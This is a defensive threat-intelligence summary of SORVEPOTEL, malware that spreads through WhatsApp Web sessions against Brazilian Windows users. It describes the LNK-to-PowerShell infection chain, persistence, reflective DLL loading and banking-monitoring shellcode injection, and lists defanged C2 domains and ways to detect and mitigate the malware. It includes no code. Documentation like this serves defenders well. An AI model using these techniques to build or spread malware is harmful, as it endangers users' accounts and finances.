Full Report
Brazilian users have emerged as the target of a new self-propagating malware dubbed SORVEPOTEL that spreads via the popular messaging app WhatsApp. The campaign, codenamed Water Saci by Trend Micro, weaponizes the trust with the platform to extend its reach across Windows systems, adding the attack is "engineered for speed and propagation" rather than data theft or ransomware. "SORVEPOTEL has
Analysis Summary
# Tool/Technique: SORVEPOTEL (Water Saci Campaign)
## Overview
SORVEPOTEL is a self-propagating malware targeting Windows users, primarily distributed via convincing phishing messages sent through WhatsApp. The campaign, codenamed "Water Saci," is engineered for rapid, large-scale propagation through automated exploitation of active WhatsApp Web sessions rather than focusing on typical objectives like data exfiltration or ransomware.
## Technical Details
- Type: Malware family
- Platform: Windows
- Capabilities: Self-propagation via WhatsApp Web, downloading and executing secondary payloads (including banking activity monitoring shellcode), establishing persistence, contacting C2 servers.
- First Seen: October 03, 2025
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment
- TA0003 - Persistence
- T1547 - Boot or Logon Autostart Execution
- T1547.001 - Registry Run Keys / Startup Folder
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (Used for C2 communication)
- TA0005 - Defense Evasion
- T1027 - Obfuscated Files or Information (Implied via PowerShell execution and in-memory loading)
## Functionality
### Core Capabilities
- **Initial Infection Vector:** Spreads via malicious ZIP file attachments delivered through WhatsApp messages (and potentially email) masquerading as receipts or health application files.
- **Execution Chain:** Initial infection involves opening a LNK file which triggers a PowerShell script to fetch the main payload.
- **Persistence:** Installs itself in the Windows Startup folder to ensure execution upon system reboot via a batch script.
- **Propagation:** If WhatsApp Web is detected as active, the malware automatically sends the malicious ZIP attachment to all contacts and groups associated with the compromised user account.
- **C2 Communication:** Executes a PowerShell command to contact C2 servers for further instructions or components.
### Advanced Features
- **WhatsApp Session Hijacking:** Specifically designed to exploit active WhatsApp Web sessions for automated, high-volume spam spreading.
- **Multi-Stage Payload:** Downloads a PowerShell script that reflectively loads a .NET DLL from the C2 server.
- **Shellcode Injection:** The DLL fetches shellcode designed to monitor banking-related activity, injecting it into the `powershell_ise.exe` process.
- **Anti-Analysis:** The DLL implements checks by scanning running processes for terms related to debugging or reverse engineering before dropping subsequent stages (Maverick.StageTwo and a WhatsApp hijacking DLL).
- **C2 Redundancy:** Maintains contact capable of communicating with multiple C2 servers.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: Malicious ZIP attachments (masquerading as receipts/app files), LNK file, Batch script installer, PowerShell script, .NET DLL, Maverick.StageTwo.
- Registry Keys: Implied use of Startup registry keys for persistence mapping to the Startup folder.
- Network Indicators:
- `sorvetenopoate[.]com` (Used for initial payload retrieval)
- `zapgrande[.]com` (Used to fetch StageTwo components)
- Behavioral Indicators: Excessive volume of WhatsApp messages sent from an account, execution chains involving LNK files leading to PowerShell, process injection into `powershell_ise.exe`.
## Associated Threat Actors
- Not explicitly named, but associated with the "Water Saci" campaign.
## Detection Methods
- Signature-based detection: Signatures for specific hashes or file names associated with the payloads.
- Behavioral detection: Monitoring for execution chains originating from LNK files spawning PowerShell, dynamic process injection into `powershell_ise.exe`, and rapid, automated sending of messages via WhatsApp Web API/sessions.
- YARA rules: Potentially applicable to detect strings or structures within the shellcode or DLLs.
## Mitigation Strategies
- **User Awareness:** Educate users about unsolicited attachments, especially those embedded in WhatsApp messages, even from trusted contacts.
- **Endpoint Security:** Use strong endpoint protection capable of detecting suspicious script execution (PowerShell abuse) and process injection.
- **Service Policy Enforcement:** Anticipate and watch for activity that violates WhatsApp's terms of service (excessive spam), which could lead to account bans.
- **Network Monitoring:** Block outbound connections to known C2 domains/IPs if available.
- **Application Restriction:** Limit use of WhatsApp Desktop/Web in high-security environments if possible, or monitor sessions closely.
## Related Tools/Techniques
- General malware propagation techniques leveraging legitimate services (e.g., Worms historically).
- Execution via LNK files commonly associated with dropper malware.